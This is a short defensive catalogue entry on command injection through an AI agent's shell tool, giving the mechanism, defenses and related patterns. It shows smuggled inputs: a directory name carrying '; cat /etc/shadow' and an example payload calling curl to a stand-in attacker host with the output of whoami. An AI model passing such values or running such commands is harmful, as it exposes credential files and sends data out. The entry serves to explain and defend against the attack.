Shell tool command injection

Agent has a run_shell tool. User supplies a value that is interpolated into a shell string without escaping.

Severity: criticalOWASP LLM: LLM06

How it works

Operator implements run_shell as 'sh -c "ls $arg"'. User asks the agent to list a directory named '. ; cat /etc/shadow'. The shell concatenation gives the user arbitrary code execution.

Example payload

List directory: '. ; curl attacker.example/$(whoami)'

Defenses

Use argv arrays instead of shell strings. Run tools in sandboxed containers with no network egress.

Related patterns

SSRF via fetch tool
Send-email as victim
Function argument smuggling
Infinite tool loop
Privileged tool confusion